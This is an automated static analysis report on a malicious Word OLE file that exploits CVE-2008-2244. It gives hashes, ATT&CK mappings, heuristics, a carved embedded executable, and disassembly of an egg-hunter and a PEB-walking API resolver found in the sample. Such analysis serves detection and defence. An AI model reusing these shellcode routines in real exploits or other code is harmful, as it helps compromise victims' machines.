Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 81dbe2d5382820b7…

MALICIOUS

Office (OLE)

73.3 KB Created: 2005-11-16 12:07:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: d124d622410e9b91e837279aa7dede95 SHA-1: 89dd0ea9408d2dba5f5c7e5eed5be30bfd8b4d67 SHA-256: 81dbe2d5382820b72621becdd79f2d6a530f38d79f743606a0a0c98eb1bba7be
600 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The file is a malicious Microsoft Word document that exploits CVE-2008-2244 to drop and execute an embedded PE executable. The presence of shellcode indicators like Egg-hunter, PEB access, and API calls such as WinExec, CreateProcess, WriteProcessMemory, and CreateRemoteThread strongly suggest the execution of a secondary payload. The embedded executable is the primary IOC.

Heuristics 14

  • CVE-2008-2244 — Microsoft Word record-parsing payload critical CVE likely CVE_2008_2244
    Word OLE document has normal small WordDocument/table streams, a large unallocated OLE slack region, and an executable or resolver shellcode payload in that slack. This is the static shape of the MS08-042 Word record-parsing exploit family tracked as CVE-2008-2244.
  • Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORY
    Reference to WriteProcessMemory API
  • Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREAD
    Reference to CreateRemoteThread API
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • Egg-hunter shellcode pattern high SC_EGG_HUNTER
    Egg-hunter shellcode pattern
    Disassembly
    Attempted x86 opcode disassembly
    00001580  6681caff0f        or dx, 0xfff
    00001585  42                inc edx
    00001586  66f7c2ff0f        test dx, 0xfff
    0000158B  7510              jne 0x159d
    0000158D  52                push edx
    0000158E  6a02              push 2
    00001590  58                pop eax
    00001591  cd2e              int 0x2e
    00001593  3c05              cmp al, 5
    00001595  5a                pop edx
    00001596  74e8              je 0x1580
    00001598  b841424142        mov eax, 0x42414241
    0000159D  8bfa              mov edi, edx
    0000159F  8bda              mov ebx, edx
    000015A1  6681e3ff0f        and bx, 0xfff
    000015A6  6681fbfd0f        cmp bx, 0xffd
    000015AB  74d3              je 0x1580
    000015AD  af                scasd eax, dword ptr es:[edi]
    000015AE  75d5              jne 0x1585
    000015B0  af                scasd eax, dword ptr es:[edi]
    000015B1  75d2              jne 0x1585
    000015B3  ffe7              jmp edi
    000015B5  cc                int3
    000015B6  cc                int3
    000015B7  cc                int3
    000015B8  cc                int3
    000015B9  cc                int3
    000015BA  cc                int3
    000015BB  cc                int3
    000015BC  cc                int3
    000015BD  cc                int3
    000015BE  cc                int3
    000015BF  cc                int3
    000015C0  cc                int3
    000015C1  3535353535        xor eax, 0x35353535
    000015C6  3535353535        xor eax, 0x35353535
    000015CB  3535353535        xor eax, 0x35353535
    000015D0  3535357862        xor eax, 0x62783535
    000015D5  1200              adc al, byte ptr [eax]
    000015D7  23242526272829    and esp, dword ptr [0x29282726]
    000015DE  3132              xor dword ptr [edx], esi
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    Attempted x86 opcode disassembly
    00004C3E  64a130000000      mov eax, dword ptr fs:[0x30]
    00004C44  8b400c            mov eax, dword ptr [eax + 0xc]
    00004C47  8b701c            mov esi, dword ptr [eax + 0x1c]
    00004C4A  ad                lodsd eax, dword ptr [esi]
    00004C4B  8b4008            mov eax, dword ptr [eax + 8]
    00004C4E  8985d8feffff      mov dword ptr [ebp - 0x128], eax
    00004C54  8985d4feffff      mov dword ptr [ebp - 0x12c], eax
    00004C5A  5e                pop esi
    00004C5B  e80f000000        call 0x4c6f
    00004C60  47                inc edi
    00004C61  657450            je 0x4cb4
    00004C64  726f              jb 0x4cd5
    00004C66  634164            arpl word ptr [ecx + 0x64], ax
    00004C69  647265            jb 0x4cd1
    00004C6C  7373              jae 0x4ce1
    00004C6E  005889            add byte ptr [eax - 0x77], bl
    00004C71  8518              test dword ptr [eax], ebx
    00004C73  fe                .byte 0xfe
    00004C74  ff                .byte 0xff
    00004C75  ff8985d0feff      dec dword ptr [ecx - 0x12f7b]
    00004C7B  ffc7              inc edi
    00004C7D  85cc              test esp, ecx
    00004C7F  fe                .byte 0xfe
    00004C80  ff                .byte 0xff
    00004C81  ff0d000000c7      dec dword ptr [0xc7000000]
    00004C87  85e0              test eax, esp
    00004C89  fe                .byte 0xfe
    00004C8A  ff                .byte 0xff
    00004C8B  ff00              inc dword ptr [eax]
    00004C8D  0000              add byte ptr [eax], al
    00004C8F  00e8              add al, ch
    00004C91  7a02              jp 0x4c95
    00004C93  0000              add byte ptr [eax], al
    00004C95  89858cfeffff      mov dword ptr [ebp - 0x174], eax
    00004C9B  e8                .byte 0xe8
    00004C9C  0d                .byte 0x0d
    00004C9D  00                .byte 0x00
  • Reference to WinExec API high SC_STR_WINEXEC
    Reference to WinExec API
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 75,059 bytes but its declared streams total only 16,486 bytes — 58,573 bytes (78%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • OLE file contains raw shellcode-like resolver payload high OLE_RAW_SHELLCODE_PAYLOAD
    Malformed or legacy OLE file contains raw PEB/API-resolver shellcode bytes at the file level, including loader-walk instructions and a nearby payload marker. This indicates an exploit payload carrier but does not identify a specific parser CVE.
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT
    Reference to VirtualProtect API

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
embedded_office_00005500.exe embedded-pe Office MZ+PE at offset 0x5500 53299 bytes
SHA-256: 8660bad9b4369e283e88ca7534c6badf27f403de96f6967f45f8bb44e8308d77